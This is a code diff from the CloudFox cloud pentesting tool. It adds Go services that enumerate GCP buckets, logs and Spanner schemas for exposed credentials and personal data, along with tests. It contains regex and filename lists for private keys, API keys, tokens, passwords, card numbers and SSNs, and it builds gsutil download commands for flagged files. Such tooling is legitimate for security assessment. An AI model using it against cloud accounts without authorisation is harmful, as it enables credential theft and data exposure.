".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, - {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, - {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, - {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, - - // Backups - HIGH - {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, - {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, - {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, - {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, - {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, - {Pattern: ".zip", Category: "Backup", RiskLevel: "MEDIUM", Description: "ZIP archive"}, - - // Source code - MEDIUM - {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, - {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, - - // Logs - LOW (but may contain sensitive data) - {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, - {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, - {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, - - // Cloud-specific - {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source"}, - {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, - {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, - {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, - } -} - // EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { ctx := context.Background() @@ -138,7 +59,7 @@ func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID } var sensitiveFiles []SensitiveFileInfo - patterns := GetSensitivePatterns() + patterns := shared.GetFilePatterns() // List objects in the bucket req := storageService.Objects.List(bucketName) @@ -163,61 +84,33 @@ func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID return sensitiveFiles, nil } -func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []SensitivePattern) *SensitiveFileInfo { +func (s *BucketEnumService) checkObjectSensitivity(obj *storage.Object, bucketName, projectID string, patterns []shared.SensitivePattern) *SensitiveFileInfo { if obj == nil { return nil } - name := strings.ToLower(obj.Name) - ext := strings.ToLower(filepath.Ext(obj.Name)) - baseName := strings.ToLower(filepath.Base(obj.Name)) - - // Check each pattern - for _, pattern := range patterns { - matched := false - patternLower := strings.ToLower(pattern.Pattern) - - // Check extension match - if strings.HasPrefix(patternLower, ".") && ext == patternLower { - matched = true - } - // Check name contains pattern - if strings.Contains(name, patternLower) { - matched = true - } - // Check base name match - if strings.Contains(baseName, patternLower) { - matched = true - } - - if matched { - // Additional filtering for common false positives - if s.isFalsePositive(obj.Name, pattern) { - continue - } + match := shared.MatchFileName(obj.Name, patterns) + if match == nil { + return nil + } - // Check if object has public access via ACLs - isPublic := s.isObjectPublic(obj) + isPublic := s.isObjectPublic(obj) - return &SensitiveFileInfo{ - BucketName: bucketName, - ObjectName: obj.Name, - ProjectID: projectID, - Size: int64(obj.Size), - ContentType: obj.ContentType, - Category: pattern.Category, - RiskLevel: pattern.RiskLevel, - Description: pattern.Description, - DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), - Updated: obj.Updated, - StorageClass: obj.StorageClass, - IsPublic: isPublic, - Encryption: s.getObjectEncryption(obj), - } - } + return &SensitiveFileInfo{ + BucketName: bucketName, + ObjectName: obj.Name, + ProjectID: projectID, + Size: int64(obj.Size), + ContentType: obj.ContentType, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: match.Description, + DownloadCmd: fmt.Sprintf("gsutil cp gs://%s/%s .", bucketName, obj.Name), + Updated: obj.Updated, + StorageClass: obj.StorageClass, + IsPublic: isPublic, + Encryption: s.getObjectEncryption(obj), } - - return nil } // isObjectPublic checks if an object has public access via ACLs @@ -260,44 +153,6 @@ func (s *BucketEnumService) getObjectEncryption(obj *storage.Object) string { return "Google-managed" } -func (s *BucketEnumService) isFalsePositive(objectName string, pattern SensitivePattern) bool { - nameLower := strings.ToLower(objectName) - - // Filter out common false positives - falsePositivePaths := []string{ - "node_modules/", - "vendor/", - ".git/objects/", - "__pycache__/", - "dist/", - "build/", - } - - for _, fp := range falsePositivePaths { - if strings.Contains(nameLower, fp) { - return true - } - } - - // JSON files that are likely not credentials - if pattern.Pattern == ".json" { - // Only flag if it looks like a service account or credential - if !strings.Contains(nameLower, "service") && - !strings.Contains(nameLower, "account") && - !strings.Contains(nameLower, "credential") && - !strings.Contains(nameLower, "key") && - !strings.Contains(nameLower, "secret") && - !strings.Contains(nameLower, "auth") { - return true - } - } - - // Filter very small files (likely empty or not useful) - // This would need to be checked at the object level - - return false -} - // ObjectInfo represents any file in a bucket (for full enumeration) type ObjectInfo struct { BucketName string `json:"bucketName"` diff --git a/gcp/services/logEnumService/logEnumService.go b/gcp/services/logEnumService/logEnumService.go new file mode 100644 index 00000000..48ffd432 --- /dev/null +++ b/gcp/services/logEnumService/logEnumService.go @@ -0,0 +1,171 @@ +package logenumservice + +import ( + "context" + "encoding/json" + "fmt" + "time" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + logging "google.golang.org/api/logging/v2" +) + +type LogEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *LogEnumService { + return &LogEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LogEnumService { + return &LogEnumService{session: session} +} + +// SensitiveLogEntry represents a log entry containing potentially sensitive content. +type SensitiveLogEntry struct { + ProjectID string `json:"projectId"` + LogName string `json:"logName"` + Timestamp string `json:"timestamp"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` + Snippet string `json:"snippet"` + ResourceType string `json:"resourceType"` + InsertID string `json:"insertId"` +} + +// getLoggingService returns a Logging service client. +func (s *LogEnumService) getLoggingService(ctx context.Context) (*logging.Service, error) { + // The REST API client doesn't use the same cached SDK pattern. + // Create directly since the logging SDK client isn't session-aware in the same way. + return logging.NewService(ctx) +} + +// EnumerateSensitiveLogs reads log entries and checks for sensitive content. +func (s *LogEnumService) EnumerateSensitiveLogs(projectID string, hours int, maxEntries int, logNameFilter string) ([]SensitiveLogEntry, error) { + ctx := context.Background() + + service, err := s.getLoggingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + patterns := shared.GetContentPatterns() + + // Build the filter + cutoff := time.Now().UTC().Add(-time.Duration(hours) * time.Hour) + filter := fmt.Sprintf("timestamp >= \"%s\"", cutoff.Format(time.RFC3339)) + if logNameFilter != "" { + filter += fmt.Sprintf(" AND logName = \"projects/%s/logs/%s\"", projectID, logNameFilter) + } + + var sensitiveEntries []SensitiveLogEntry + totalProcessed := 0 + pageToken := "" + + for { + if maxEntries > 0 && totalProcessed >= maxEntries { + break + } + + pageSize := int64(1000) + remaining := maxEntries - totalProcessed + if maxEntries > 0 && remaining < int(pageSize) { + pageSize = int64(remaining) + } + + req := &logging.ListLogEntriesRequest{ + ResourceNames: []string{fmt.Sprintf("projects/%s", projectID)}, + Filter: filter, + OrderBy: "timestamp desc", + PageSize: pageSize, + PageToken: pageToken, + } + + resp, err := service.Entries.List(req).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + for _, entry := range resp.Entries { + totalProcessed++ + + // Extract text content from the entry + text := extractEntryText(entry) + if text == "" { + continue + } + + matches := shared.MatchContent(text, patterns) + for _, match := range matches { + // Extract short log name + logName := entry.LogName + resourceType := "" + if entry.Resource != nil { + resourceType = entry.Resource.Type + } + + sensitiveEntries = append(sensitiveEntries, SensitiveLogEntry{ + ProjectID: projectID, + LogName: logName, + Timestamp: entry.Timestamp, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: match.Description, + Snippet: truncate(match.Snippet, 200), + ResourceType: resourceType, + InsertID: entry.InsertId, + }) + break // One match per entry is sufficient + } + } + + pageToken = resp.NextPageToken + if pageToken == "" { + break + } + } + + return sensitiveEntries, nil +} + +// extractEntryText pulls all text content from a log entry for scanning. +func extractEntryText(entry *logging.LogEntry) string { + if entry == nil { + return "" + } + + var text string + + // textPayload is the simplest + if entry.TextPayload != "" { + text += entry.TextPayload + "\n" + } + + // jsonPayload - serialize to string for scanning + if entry.JsonPayload != nil { + jsonBytes, err := json.Marshal(entry.JsonPayload) + if err == nil { + text += string(jsonBytes) + "\n" + } + } + + // protoPayload - serialize to string for scanning + if entry.ProtoPayload != nil { + jsonBytes, err := json.Marshal(entry.ProtoPayload) + if err == nil { + text += string(jsonBytes) + "\n" + } + } + + return text +} + +func truncate(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + return s[:maxLen] + "..." +} diff --git a/gcp/services/spannerEnumService/spannerEnumService.go b/gcp/services/spannerEnumService/spannerEnumService.go new file mode 100644 index 00000000..0b2634f6 --- /dev/null +++ b/gcp/services/spannerEnumService/spannerEnumService.go @@ -0,0 +1,201 @@ +package spannerenumservice + +import ( + "context" + "fmt" + "regexp" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerEnumService { + return &SpannerEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SpannerEnumService { + return &SpannerEnumService{session: session} +} + +// SensitiveSpannerResource represents a Spanner resource flagged as potentially sensitive. +type SensitiveSpannerResource struct { + ProjectID string `json:"projectId"` + Instance string `json:"instance"` + Database string `json:"database"` + Table string `json:"table"` + Column string `json:"column"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getSpannerService returns a Spanner service client. +func (s *SpannerEnumService) getSpannerService(ctx context.Context) (*spanner.Service, error) { + return spanner.NewService(ctx) +} + +// EnumerateSensitiveResources scans Spanner DDL for sensitive table/column names. +func (s *SpannerEnumService) EnumerateSensitiveResources(projectID string) ([]SensitiveSpannerResource, error) { + ctx := context.Background() + + service, err := s.getSpannerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + var resources []SensitiveSpannerResource + + // List instances + parent := fmt.Sprintf("projects/%s", projectID) + err = service.Projects.Instances.List(parent).Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + instanceName := extractName(instance.Name) + + // List databases for this instance + err := service.Projects.Instances.Databases.List(instance.Name).Pages(ctx, func(dbPage *spanner.ListDatabasesResponse) error { + for _, db := range dbPage.Databases { + dbName := extractName(db.Name) + + // Get DDL for this database + ddlResp, err := service.Projects.Instances.Databases.GetDdl(db.Name).Context(ctx).Do() + if err != nil { + continue + } + + // Parse DDL for table and column names + for _, stmt := range ddlResp.Statements { + tableName, columns := parseDDLStatement(stmt) + if tableName == "" { + continue + } + + // Check table name + if match := shared.MatchResourceName(tableName, namePatterns); match != nil { + resources = append(resources, SensitiveSpannerResource{ + ProjectID: projectID, + Instance: instanceName, + Database: dbName, + Table: tableName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Check column names + for _, col := range columns { + if match := shared.MatchResourceName(col, namePatterns); match != nil { + resources = append(resources, SensitiveSpannerResource{ + ProjectID: projectID, + Instance: instanceName, + Database: dbName, + Table: tableName, + Column: col, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column name: %s", match.Description), + }) + } + } + } + } + return nil + }) + if err != nil { + // Continue to next instance on error + continue + } + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return resources, nil +} + +// createTableRegex matches CREATE TABLE statements. +var createTableRegex = regexp.MustCompile(`(?i)CREATE\s+TABLE\s+(\S+)\s*\(`) + +// columnRegex matches column definitions inside CREATE TABLE parentheses. +var columnRegex = regexp.MustCompile(`(?i)^\s*(\w+)\s+`) + +// parseDDLStatement extracts table name and column names from a CREATE TABLE DDL statement. +func parseDDLStatement(stmt string) (string, []string) { + match := createTableRegex.FindStringSubmatch(stmt) + if match == nil { + return "", nil + } + + tableName := strings.Trim(match[1], "`\"") + + // Find the content between the first ( and the matching ) + parenStart := strings.Index(stmt, "(") + if parenStart < 0 { + return tableName, nil + } + + // Find matching closing paren + depth := 0 + parenEnd := -1 + for i := parenStart; i < len(stmt); i++ { + switch stmt[i] { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + parenEnd = i + } + } + if parenEnd >= 0 { + break + } + } + + if parenEnd < 0 { + return tableName, nil + } + + columnsStr := stmt[parenStart+1 : parenEnd] + lines := strings.Split(columnsStr, ",") + + var columns []string + for _, line := range lines { + line = strings.TrimSpace(line) + if line == "" { + continue + } + // Skip constraint lines + lineLower := strings.ToLower(line) + if strings.HasPrefix(lineLower, "constraint") || + strings.HasPrefix(lineLower, "primary key") || + strings.HasPrefix(lineLower, "foreign key") || + strings.HasPrefix(lineLower, "interleave") { + continue + } + colMatch := columnRegex.FindStringSubmatch(line) + if colMatch != nil { + columns = append(columns, colMatch[1]) + } + } + + return tableName, columns +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/shared/sensitive.go b/gcp/shared/sensitive.go new file mode 100644 index 00000000..800f31d3 --- /dev/null +++ b/gcp/shared/sensitive.go @@ -0,0 +1,368 @@ +package shared + +import ( + "regexp" + "strings" +) + +// SensitivePattern defines a pattern for matching file/object names or resource names. +type SensitivePattern struct { + Pattern string + Category string + RiskLevel string + Description string +} + +// ContentPattern defines a regex-based pattern for matching inside text content. +type ContentPattern struct { + Regex *regexp.Regexp + Category string + RiskLevel string + Description string +} + +// SensitiveMatch represents a file/resource name match result. +type SensitiveMatch struct { + Pattern string + Category string + RiskLevel string + Description string + MatchedText string +} + +// ContentMatch represents a content regex match result. +type ContentMatch struct { + Pattern string + Category string + RiskLevel string + Description string + MatchedText string + Snippet string // surrounding context +} + +// GetFilePatterns returns patterns for detecting sensitive files in bucket/object names. +// These are the same patterns previously defined in bucketEnumService. +func GetFilePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials - CRITICAL + {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, + {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, + {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, + {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, + {Pattern: ".pem", Category: "Credential", RiskLevel: "CRITICAL", Description: "PEM private key"}, + {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, + {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, + {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, + {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, + {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, + {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, + + // Secrets - CRITICAL/HIGH + {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, + {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, + {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, + {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, + {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, + {Pattern: "auth", Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, + {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, + {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, + + // Config files - HIGH/MEDIUM + {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, + {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, + {Pattern: "application.properties", Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, + {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, + {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, + {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, + {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, + {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, + {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, + {Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, + {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, + {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, + {Pattern: ".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, + {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, + {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + + // Backups - HIGH + {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, + {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, + {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, + {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, + {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, + {Pattern: ".zip", Category: "Backup", RiskLevel: "MEDIUM", Description: "ZIP archive"}, + + // Source code - MEDIUM + {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, + {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, + + // Logs - LOW (but may contain sensitive data) + {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, + {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, + {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, + + // Cloud-specific + {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source"}, + {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, + {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, + {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, + } +} + +// contentPatterns is the compiled list, initialized once. +var contentPatterns []ContentPattern + +func init() { + contentPatterns = compileContentPatterns() +} + +func compileContentPatterns() []ContentPattern { + defs := []struct { + pattern string + category string + riskLevel string + description string + }{ + // Credentials - CRITICAL + {`"type"\s*:\s*"service_account"`, "Credential", "CRITICAL", "GCP service account key JSON"}, + {`-----BEGIN\s*(RSA|EC|DSA|OPENSSH)?\s*PRIVATE KEY-----`, "Credential", "CRITICAL", "Private key"}, + {`AKIA[0-9A-Z]{16}`, "Credential", "CRITICAL", "AWS access key"}, + {`AIza[0-9A-Za-z_\-]{35}`, "Credential", "CRITICAL", "GCP API key"}, + + // Secrets - HIGH + {`(?i)(password|passwd|pwd)\s*[:=]\s*\S+`, "Secret", "HIGH", "Password assignment"}, + {`(?i)bearer\s+[a-zA-Z0-9_\-\.]+`, "Secret", "HIGH", "Bearer token"}, + {`(?i)(jdbc|mongodb|mysql|postgres|redis)://[^\s]+`, "Secret", "HIGH", "Connection string"}, + + // Tokens - HIGH + {`eyJ[a-zA-Z0-9_-]*\.eyJ[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*`, "Token", "HIGH", "JWT token"}, + {`ya29\.[0-9A-Za-z_-]+`, "Token", "HIGH", "GCP OAuth token"}, + {`gh[ps]_[A-Za-z0-9_]{36,}`, "Token", "HIGH", "GitHub token"}, + + // PII - MEDIUM + {`\b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|3[47][0-9]{13})\b`, "PII", "MEDIUM", "Credit card number"}, + {`\b\d{3}-\d{2}-\d{4}\b`, "PII", "MEDIUM", "SSN pattern"}, + } + + patterns := make([]ContentPattern, 0, len(defs)) + for _, d := range defs { + compiled := regexp.MustCompile(d.pattern) + patterns = append(patterns, ContentPattern{ + Regex: compiled, + Category: d.category, + RiskLevel: d.riskLevel, + Description: d.description, + }) + } + return patterns +} + +// GetContentPatterns returns regex-based patterns for matching inside text content +// (log entries, query results, etc.). +func GetContentPatterns() []ContentPattern { + return contentPatterns +} + +// GetNamePatterns returns patterns for detecting sensitive resource names +// (table names, column names, dataset names). +func GetNamePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials/keys + {Pattern: "password", Category: "Credential", RiskLevel: "HIGH", Description: "Password-related resource"}, + {Pattern: "passwd", Category: "Credential", RiskLevel: "HIGH", Description: "Password-related resource"}, + {Pattern: "secret", Category: "Credential", RiskLevel: "HIGH", Description: "Secret-related resource"}, + {Pattern: "credential", Category: "Credential", RiskLevel: "HIGH", Description: "Credential-related resource"}, + {Pattern: "token", Category: "Credential", RiskLevel: "HIGH", Description: "Token-related resource"}, + {Pattern: "auth", Category: "Credential", RiskLevel: "MEDIUM", Description: "Authentication-related resource"}, + {Pattern: "private_key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key resource"}, + {Pattern: "api_key", Category: "Credential", RiskLevel: "HIGH", Description: "API key resource"}, + {Pattern: "access_key", Category: "Credential", RiskLevel: "HIGH", Description: "Access key resource"}, + {Pattern: "encryption_key", Category: "Credential", RiskLevel: "HIGH", Description: "Encryption key resource"}, + + // PII + {Pattern: "ssn", Category: "PII", RiskLevel: "HIGH", Description: "SSN-related resource"}, + {Pattern: "social_security", Category: "PII", RiskLevel: "HIGH", Description: "Social security resource"}, + {Pattern: "credit_card", Category: "PII", RiskLevel: "HIGH", Description: "Credit card resource"}, + {Pattern: "cc_number", Category: "PII", RiskLevel: "HIGH", Description: "Credit card number resource"}, + {Pattern: "cvv", Category: "PII", RiskLevel: "HIGH", Description: "CVV resource"}, + + // Compliance + {Pattern: "pii", Category: "Compliance", RiskLevel: "HIGH", Description: "PII-labeled resource"}, + {Pattern: "phi", Category: "Compliance", RiskLevel: "HIGH", Description: "PHI-labeled resource"}, + {Pattern: "hipaa", Category: "Compliance", RiskLevel: "HIGH", Description: "HIPAA-labeled resource"}, + {Pattern: "gdpr", Category: "Compliance", RiskLevel: "HIGH", Description: "GDPR-labeled resource"}, + {Pattern: "sensitive", Category: "Compliance", RiskLevel: "MEDIUM", Description: "Sensitive-labeled resource"}, + + // Financial + {Pattern: "payment", Category: "Financial", RiskLevel: "HIGH", Description: "Payment-related resource"}, + {Pattern: "billing", Category: "Financial", RiskLevel: "MEDIUM", Description: "Billing-related resource"}, + {Pattern: "financial", Category: "Financial", RiskLevel: "HIGH", Description: "Financial resource"}, + {Pattern: "salary", Category: "Financial", RiskLevel: "HIGH", Description: "Salary-related resource"}, + {Pattern: "bank", Category: "Financial", RiskLevel: "HIGH", Description: "Banking-related resource"}, + + // General sensitive data + {Pattern: "user_data", Category: "Data", RiskLevel: "MEDIUM", Description: "User data resource"}, + {Pattern: "customer_data", Category: "Data", RiskLevel: "MEDIUM", Description: "Customer data resource"}, + {Pattern: "personal", Category: "Data", RiskLevel: "MEDIUM", Description: "Personal data resource"}, + {Pattern: "confidential", Category: "Data", RiskLevel: "HIGH", Description: "Confidential resource"}, + } +} + +// MatchFileName checks an object/file name against file patterns. +// Returns the first match, or nil if no match. +func MatchFileName(objectName string, patterns []SensitivePattern) *SensitiveMatch { + name := strings.ToLower(objectName) + ext := strings.ToLower(fileExt(objectName)) + baseName := strings.ToLower(fileBase(objectName)) + + for _, pattern := range patterns { + matched := false + patternLower := strings.ToLower(pattern.Pattern) + + // Check extension match + if strings.HasPrefix(patternLower, ".") && ext == patternLower { + matched = true + } + // Check name contains pattern + if strings.Contains(name, patternLower) { + matched = true + } + // Check base name match + if strings.Contains(baseName, patternLower) { + matched = true + } + + if matched { + if IsFilePathFalsePositive(objectName, pattern) { + continue + } + return &SensitiveMatch{ + Pattern: pattern.Pattern, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: objectName, + } + } + } + return nil +} + +// MatchContent checks text content against content patterns. +// Returns all matches found. +func MatchContent(text string, patterns []ContentPattern) []ContentMatch { + var matches []ContentMatch + for _, pattern := range patterns { + locs := pattern.Regex.FindAllStringIndex(text, -1) + for _, loc := range locs { + matchedText := text[loc[0]:loc[1]] + snippet := extractSnippet(text, loc[0], loc[1], 50) + matches = append(matches, ContentMatch{ + Pattern: pattern.Regex.String(), + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: matchedText, + Snippet: snippet, + }) + } + } + return matches +} + +// MatchResourceName checks a resource name (table, column, dataset) against name patterns. +// Uses case-insensitive substring matching. Returns the first match, or nil. +func MatchResourceName(name string, patterns []SensitivePattern) *SensitiveMatch { + nameLower := strings.ToLower(name) + for _, pattern := range patterns { + patternLower := strings.ToLower(pattern.Pattern) + if strings.Contains(nameLower, patternLower) { + return &SensitiveMatch{ + Pattern: pattern.Pattern, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: name, + } + } + } + return nil +} + +// IsFilePathFalsePositive checks if a file path match is a common false positive. +func IsFilePathFalsePositive(path string, pattern SensitivePattern) bool { + nameLower := strings.ToLower(path) + + // Filter out common false positive paths + falsePositivePaths := []string{ + "node_modules/", + "vendor/", + ".git/objects/", + "__pycache__/", + "dist/", + "build/", + } + + for _, fp := range falsePositivePaths { + if strings.Contains(nameLower, fp) { + return true + } + } + + // JSON files that are likely not credentials + if pattern.Pattern == ".json" { + if !strings.Contains(nameLower, "service") && + !strings.Contains(nameLower, "account") && + !strings.Contains(nameLower, "credential") && + !strings.Contains(nameLower, "key") && + !strings.Contains(nameLower, "secret") && + !strings.Contains(nameLower, "auth") { + return true + } + } + + return false +} + +// extractSnippet returns surrounding context around a match. +func extractSnippet(text string, start, end, contextLen int) string { + snippetStart := start - contextLen + if snippetStart < 0 { + snippetStart = 0 + } + snippetEnd := end + contextLen + if snippetEnd > len(text) { + snippetEnd = len(text) + } + snippet := text[snippetStart:snippetEnd] + // Replace newlines with spaces for cleaner output + snippet = strings.ReplaceAll(snippet, "\n", " ") + snippet = strings.ReplaceAll(snippet, "\r", "") + return snippet +} + +// fileExt returns the file extension (e.g., ".json"). +func fileExt(name string) string { + for i := len(name) - 1; i >= 0; i-- { + if name[i] == '.' { + return name[i:] + } + if name[i] == '/' { + return "" + } + } + return "" +} + +// fileBase returns the last component of a path. +func fileBase(name string) string { + for i := len(name) - 1; i >= 0; i-- { + if name[i] == '/' { + return name[i+1:] + } + } + return name +} diff --git a/gcp/shared/sensitive_test.go b/gcp/shared/sensitive_test.go new file mode 100644 index 00000000..4388fdf4 --- /dev/null +++ b/gcp/shared/sensitive_test.go @@ -0,0 +1,191 @@ +package shared + +import ( + "testing" +) + +func TestMatchFileName_Credential(t *testing.T) { + patterns := GetFilePatterns() + + tests := []struct { + name string + input string + wantNil bool + category string + }{ + {"service account key", "my-project-sa-key.json", false, "Credential"}, + {"pem file", "certs/server.pem", false, "Credential"}, + {"ssh key", "home/.ssh/id_rsa", false, "Credential"}, + {"p12 file", "keys/cert.p12", false, "Credential"}, + {"random txt", "readme.txt", true, ""}, + {"random png", "image.png", true, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := MatchFileName(tt.input, patterns) + if tt.wantNil && result != nil { + t.Errorf("expected nil match for %q, got %+v", tt.input, result) + } + if !tt.wantNil && result == nil { + t.Errorf("expected match for %q, got nil", tt.input) + } + if !tt.wantNil && result != nil && result.Category != tt.category { + t.Errorf("expected category %q for %q, got %q", tt.category, tt.input, result.Category) + } + }) + } +} + +func TestMatchFileName_FalsePositives(t *testing.T) { + patterns := GetFilePatterns() + + // These should be filtered as false positives + fps := []string{ + "node_modules/package.json", + "vendor/lib/config.yaml", + 